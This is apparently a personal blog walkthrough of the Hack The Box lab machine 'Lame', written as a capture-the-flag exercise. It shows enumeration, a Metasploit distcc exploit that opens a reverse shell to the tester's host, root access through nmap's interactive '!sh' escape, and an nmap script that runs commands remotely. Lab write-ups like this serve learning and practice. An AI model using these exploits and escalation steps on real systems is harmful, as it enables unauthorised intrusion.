Hack the Box Walkthrough – LAME machine
New walkthrough today about the easy machine LAME from Hack The Box. Probably one of the easiest machine in HTB when we look at the own numbers.
Let’s jump in !
ENUMERATION
As usual we start with an nmap enumeration to see what we are dealing with.
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.55.194 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 03:42 EST
Nmap scan report for 10.129.55.194
Host is up (0.026s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h32m53s, deviation: 3h32m10s, median: 2m51s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2020-11-28T03:47:43-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.65 seconds
We see the FTP port open which allows anonymous connection – let’s have a look:
[email protected]:~/Documents$ ftp 10.129.55.194
Connected to 10.129.55.194.
220 (vsFTPd 2.3.4)
Name (10.129.55.194:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp>
Nothing insterresting..
We have as well a samba SMB running – let’s have a quick look:
[email protected]:~/Documents$ smbclient -L 10.129.55.194
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
mmk ok.. protocol negotiation failed.
A look on Google gave the solution: edit the file /etc/samba/smb.conf and add the following under the global section:
client min protocol = NT1let’s try again:
[email protected]:~/Documents$ smbclient -L 10.129.55.194
Enter WORKGROUP\kali's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
Maybe something interresting in the shared tmp folder:
[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/tmp
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 28 04:01:12 2020
.. DR 0 Sat Oct 31 03:33:58 2020
.ICE-unix DH 0 Sat Nov 28 03:41:15 2020
vmware-root DR 0 Sat Nov 28 03:41:38 2020
.X11-unix DH 0 Sat Nov 28 03:41:42 2020
.X0-lock HR 11 Sat Nov 28 03:41:42 2020
5581.jsvc_up R 0 Sat Nov 28 03:42:29 2020
vgauthsvclog.txt.0 R 1600 Sat Nov 28 03:41:13 2020
7282168 blocks of size 1024. 5385868 blocks availableNope.. the shared opt folder ?
[email protected]:~/Documents$ smbclient --no-pass //10.129.55.194/opt
Anonymous login successful
tree connect failed: NT_STATUS_ACCESS_DENIEDNope..
Ok then we have a port 3632 opens for distcc
From wikipedia, we know that distcc is a tool for speeding up compilation of source code by using distributed computing over a computer network.
A search with searchsploit give a nice result:
let’s give a try
FOOTHOLD
There are only two options to set:
I have then added a payload and configure it
time now to run our exploit :
msf6 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 10.10.14.106:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo mm0VQUXWQUFfriyg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.14.106:4444 -> 10.129.31.153:38737) at 2020-11-28 08:35:44 -0500
And we have a shell !
PRIVILEGE ESCALATION
By running a linpeas report I found out that nmap is installed and may help for our priv esc
Indeed, the nmap interactive mode can be used to execute shell command
[email protected]:/tmp$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
And we are root !
other ways to do
I read here that we could use nmap to our foothold shell.
[email protected]:~$ sudo wget https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse -O /usr/share/nmap/scripts/distcc-exec.nse
[sudo] password for kali:
--2020-11-28 09:01:51-- https://svn.nmap.org/nmap/scripts/distcc-cve2004-2687.nse
Resolving svn.nmap.org (svn.nmap.org)... 45.33.49.119, 2600:3c01:e000:3e6::6d4e:7061
Connecting to svn.nmap.org (svn.nmap.org)|45.33.49.119|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3519 (3.4K) [text/plain]
Saving to: ‘/usr/share/nmap/scripts/distcc-exec.nse’
/usr/share/nmap/scripts/distcc-exec.nse 100%[=======================================================================================================================================>] 3.44K --.-KB/s in 0s
2020-11-28 09:01:52 (128 MB/s) - ‘/usr/share/nmap/scripts/distcc-exec.nse’ saved [3519/3519]
then run the following command:
[email protected]:~$ nmap -p 3632 10.129.31.153 --script distcc-exec --script-args="distcc-exec.cmd='id'" -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 09:03 EST
Nmap scan report for 10.129.31.153
Host is up (0.025s latency).
PORT STATE SERVICE
3632/tcp open distccd
| distcc-exec:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://distcc.github.io/security.html
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Then reading the HTB official write up there was a easier way to do.
They used the metasploit exploit exploit/multi/samba/usermap_script and got root directly
